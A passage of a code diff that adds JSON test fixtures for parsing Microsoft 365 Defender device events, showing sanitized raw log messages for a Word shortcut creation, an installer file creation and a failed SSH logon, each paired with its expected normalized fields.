office\\\\root\\\\office16\\\\winword.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":\"f1d50e0d3e0ba197baf152614e0cd94487a1142e\",\"MD5\":\"5d5608654828cf052ba013b3c37cbb61\",\"FileName\":\"FILENAME.LNK\",\"FolderPath\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"FileSizeInBytes\\\":914,\\\"VolumeGuidPath\\\":\\\"\\\\\\\\\\\\\\\\?\\\\\\\\Volume{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\\\",\\\"IsOnRemovableMedia\\\":false,\\\"ShellLinkRunAsAdmin\\\":false,\\\"ShellLinkShowCommand\\\":\\\"SW_SHOWNORMAL\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"SHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"RemoteUrl\":null,\"ProcessCreationTime\":\"2024-11-06T16:05:23.1138023Z\",\"ProcessTokenElevation\":null,\"ActionType\":\"ShellLinkCreateFileEvent\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":8066492,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JOHNDOE@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-abcd-5678-abcdef123456\",\"FileSize\":null,\"InitiatingProcessFileSize\":1621656,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Office\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"WinWord\",\"InitiatingProcessVersionInfoOriginalFileName\":\"WinWord.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Word\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:23.3307226Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:17:23.330722Z", + "action": { + "properties": { + "InitiatingProcessAccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", + "InitiatingProcessCommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "InitiatingProcessFileSize": 1621656, + "InitiatingProcessLogonId": "8066492", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft Word", + "InitiatingProcessVersionInfoInternalFileName": "WinWord", + "InitiatingProcessVersionInfoOriginalFileName": "WinWord.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft Office", + "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216" + }, + "type": "ShellLinkCreateFileEvent" + }, + "file": { + "directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office\\Recent", + "hash": { + "md5": "5d5608654828cf052ba013b3c37cbb61", + "sha1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "FILENAME.LNK" + }, + "host": { + "id": "abcdef0123456789", + "name": "user.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "22722" + } + } + }, + "process": { + "args": [ + "\"\"", + "\"I:\\COMPANY\\Service\\FILE.doc\"", + "/n", + "/o" + ], + "command_line": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "executable": "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + }, + "name": "winword.exe", + "parent": { + "name": "explorer.exe", + "pid": 14616, + "start": "2024-11-12T08:47:41.952077Z" + }, + "pid": 20948, + "start": "2024-11-12T10:02:28.777910Z", + "user": { + "domain": "company", + "email": "JOHNDOE@COMPANY.COM", + "id": "S-1-2-3", + "name": "jdoe" + }, + "working_directory": "c:\\program files (x86)\\microsoft office\\root\\office16" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "5d5608654828cf052ba013b3c37cbb61", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "f1d50e0d3e0ba197baf152614e0cd94487a1142e" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json new file mode 100644 index 000000000..73d8718f8 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json @@ -0,0 +1,107 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-08T14:42:24.2882642Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:41:06.9726687Z\",\"properties\":{\"SHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"FileSize\":640920,\"MD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"FileName\":\"FileName.dll\",\"FolderPath\":\"C:\\\\Program Files\\\\FileName.dll\",\"InitiatingProcessCommandLine\":\"commandexec.exe /V\",\"InitiatingProcessFileName\":\"commandexec.exe\",\"InitiatingProcessParentFileName\":\"services.exe\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\commandexec.exe\",\"InitiatingProcessParentCreationTime\":\"2024-10-09T01:02:27.2227081Z\",\"InitiatingProcessId\":16468,\"DeviceName\":\"device.company.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:23.2383083Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessParentId\":888,\"ReportId\":341972,\"SHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessIntegrityLevel\":\"System\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"FileOriginReferrerUrl\":null,\"AppGuardContainerId\":\"\",\"ActionType\":\"FileCreated\",\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"RequestProtocol\":\"Local\",\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestAccountName\":\"Syst\u00e8me\",\"RequestAccountDomain\":\"ACCOUNT DOMAIN\",\"RequestAccountSid\":\"S-1-2-3\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"FileType\\\":\\\"PortableExecutable\\\"}\",\"PreviousFolderPath\":\"\",\"PreviousFileName\":\"\",\"InitiatingProcessFileSize\":176128,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"commandexec\",\"InitiatingProcessVersionInfoOriginalFileName\":\"commandexec.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"InitiatingProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-08T14:38:51.9048761Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-08T14:42:24.2882642Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:41:06.9726687Z\",\"properties\":{\"SHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"FileSize\":640920,\"MD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"FileName\":\"FileName.dll\",\"FolderPath\":\"C:\\\\Program Files\\\\FileName.dll\",\"InitiatingProcessCommandLine\":\"commandexec.exe /V\",\"InitiatingProcessFileName\":\"commandexec.exe\",\"InitiatingProcessParentFileName\":\"services.exe\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\commandexec.exe\",\"InitiatingProcessParentCreationTime\":\"2024-10-09T01:02:27.2227081Z\",\"InitiatingProcessId\":16468,\"DeviceName\":\"device.company.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:23.2383083Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessParentId\":888,\"ReportId\":341972,\"SHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessIntegrityLevel\":\"System\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"FileOriginReferrerUrl\":null,\"AppGuardContainerId\":\"\",\"ActionType\":\"FileCreated\",\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"RequestProtocol\":\"Local\",\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestAccountName\":\"Syst\u00e8me\",\"RequestAccountDomain\":\"ACCOUNT DOMAIN\",\"RequestAccountSid\":\"S-1-2-3\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"FileType\\\":\\\"PortableExecutable\\\"}\",\"PreviousFolderPath\":\"\",\"PreviousFileName\":\"\",\"InitiatingProcessFileSize\":176128,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"commandexec\",\"InitiatingProcessVersionInfoOriginalFileName\":\"commandexec.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"InitiatingProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-08T14:38:51.9048761Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "file" + ], + "dataset": "device_file_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-08T14:38:51.904876Z", + "action": { + "properties": { + "InitiatingProcessCommandLine": "commandexec.exe /V", + "InitiatingProcessFileSize": 176128, + "InitiatingProcessIntegrityLevel": "System", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer", + "InitiatingProcessVersionInfoInternalFileName": "commandexec", + "InitiatingProcessVersionInfoOriginalFileName": "commandexec.exe", + "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode", + "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880", + "RequestAccountSid": "S-1-2-3" + }, + "type": "FileCreated" + }, + "file": { + "directory": "C:\\Program Files\\FileName.dll", + "hash": { + "md5": "9a3af3a9ce0217bccce1d161e0b6bfde", + "sha1": "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", + "sha256": "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595" + }, + "name": "FileName.dll", + "size": 640920 + }, + "host": { + "id": "123456789abcdef", + "name": "device.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "341972" + } + } + }, + "network": { + "protocol": "Local" + }, + "process": { + "args": [ + "/V" + ], + "command_line": "commandexec.exe /V", + "executable": "c:\\windows\\system32\\commandexec.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + }, + "name": "commandexec.exe", + "parent": { + "name": "services.exe", + "pid": 888, + "start": "2024-10-09T01:02:27.222708Z" + }, + "pid": 16468, + "start": "2024-11-08T14:38:23.238308Z", + "user": { + "domain": "account domain", + "id": "S-1-2-3", + "name": "syst\u00e8me" + }, + "working_directory": "c:\\windows\\system32" + }, + "related": { + "hash": [ + "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595", + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", + "9a3af3a9ce0217bccce1d161e0b6bfde" + ], + "user": [ + "Syst\u00e8me" + ] + }, + "user": { + "domain": "ACCOUNT DOMAIN", + "name": "Syst\u00e8me" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json b/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json new file mode 100644 index 000000000..1d69ebb63 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json @@ -0,0 +1,98 @@ +{ + "input": { + "message": "{\"time\": \"2024-11-18T10:08:29.9147832Z\", \"tenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceLogonEvents\", \"_TimeReceivedBySvc\": \"2024-11-18T10:07:35.3397350Z\", \"properties\": {\"AccountName\": \"account\", \"AccountDomain\": \"domain\", \"LogonType\": \"Network\", \"DeviceName\": \"domain\", \"DeviceId\": \"1111111111111111111111111111111111111111\", \"ReportId\": 413706, \"AccountSid\": null, \"AppGuardContainerId\": null, \"LogonId\": null, \"RemoteIP\": \"1.2.3.4\", \"RemotePort\": null, \"RemoteDeviceName\": null, \"ActionType\": \"LogonFailed\", \"InitiatingProcessId\": 3653343, \"InitiatingProcessCreationTime\": \"2024-11-18T10:07:20.29393Z\", \"InitiatingProcessFileName\": \"sshd\", \"InitiatingProcessFolderPath\": \"/usr/sbin/sshd\", \"InitiatingProcessSHA1\": \"f1d50e0d3e0ba197baf152614e0cd94487a1142e\", \"InitiatingProcessSHA256\": \"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\", \"InitiatingProcessMD5\": \"51a9cac9c4e8da44ffd7502be17604ee\", \"InitiatingProcessCommandLine\": \"/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"domain\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"InitiatingProcessParentId\": 3653343, \"InitiatingProcessParentCreationTime\": \"2024-11-18T10:07:20.29Z\", \"InitiatingProcessParentFileName\": \"sshd\", \"AdditionalFields\": \"{\\\"PosixUserId\\\":1301,\\\"PosixPrimaryGroupName\\\":\\\"account\\\",\\\"PosixPrimaryGroupId\\\":500,\\\"PosixSecondaryGroups\\\":\\\"[{\\\\\\\"Name\\\\\\\":\\\\\\\"users\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":100},{\\\\\\\"Name\\\\\\\":\\\\\\\"exploitation\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":1202}]\\\",\\\"InitiatingAccountName\\\":\\\"root\\\",\\\"InitiatingAccountDomain\\\":\\\"domain\\\",\\\"InitiatingAccountPosixUserId\\\":0,\\\"InitiatingAccountPosixGroupName\\\":\\\"mdatp\\\",\\\"InitiatingAccountPosixGroupId\\\":595}\", \"RemoteIPType\": \"Private\", \"IsLocalAdmin\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"Protocol\": null, \"FailureReason\": null, \"InitiatingProcessFileSize\": 890528, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-11-18T10:07:22.681617Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\": \"2024-11-18T10:08:29.9147832Z\", \"tenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceLogonEvents\", \"_TimeReceivedBySvc\": \"2024-11-18T10:07:35.3397350Z\", \"properties\": {\"AccountName\": \"account\", \"AccountDomain\": \"domain\", \"LogonType\": \"Network\", \"DeviceName\": \"domain\", \"DeviceId\": \"1111111111111111111111111111111111111111\", \"ReportId\": 413706, \"AccountSid\": null, \"AppGuardContainerId\": null, \"LogonId\": null, \"RemoteIP\": \"1.2.3.4\", \"RemotePort\": null, \"RemoteDeviceName\": null, \"ActionType\": \"LogonFailed\", \"InitiatingProcessId\": 3653343, \"InitiatingProcessCreationTime\": \"2024-11-18T10:07:20.29393Z\", \"InitiatingProcessFileName\": \"sshd\", \"InitiatingProcessFolderPath\": \"/usr/sbin/sshd\", \"InitiatingProcessSHA1\": \"f1d50e0d3e0ba197baf152614e0cd94487a1142e\", \"InitiatingProcessSHA256\": \"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\", \"InitiatingProcessMD5\": \"51a9cac9c4e8da44ffd7502be17604ee\", \"InitiatingProcessCommandLine\": \"/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"domain\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"InitiatingProcessParentId\": 3653343, \"InitiatingProcessParentCreationTime\": \"2024-11-18T10:07:20.29Z\", \"InitiatingProcessParentFileName\": \"sshd\", \"AdditionalFields\": \"{\\\"PosixUserId\\\":1301,\\\"PosixPrimaryGroupName\\\":\\\"account\\\",\\\"PosixPrimaryGroupId\\\":500,\\\"PosixSecondaryGroups\\\":\\\"[{\\\\\\\"Name\\\\\\\":\\\\\\\"users\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":100},{\\\\\\\"Name\\\\\\\":\\\\\\\"exploitation\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":1202}]\\\",\\\"InitiatingAccountName\\\":\\\"root\\\",\\\"InitiatingAccountDomain\\\":\\\"domain\\\",\\\"InitiatingAccountPosixUserId\\\":0,\\\"InitiatingAccountPosixGroupName\\\":\\\"mdatp\\\",\\\"InitiatingAccountPosixGroupId\\\":595}\", \"RemoteIPType\": \"Private\", \"IsLocalAdmin\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"Protocol\": null, \"FailureReason\": null, \"InitiatingProcessFileSize\": 890528, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-11-18T10:07:22.681617Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "authentication" + ], + "dataset": "device_logon_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-18T10:07:22.681617Z", + "action": { + "properties": { + "InitiatingProcessCommandLine": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R", + "InitiatingProcessFileSize": 890528, + "LogonType": "Network", + "RemoteIPType": "Private" + }, + "type": "LogonFailed" + }, + "destination": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "host": { + "id": "1111111111111111111111111111111111111111", + "name": "domain" + }, + "microsoft": { + "defender": { + "report": { + "id": "413706" + } + } + }, + "process": { + "args": [ + "-D", + "-R", + "-oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa", + 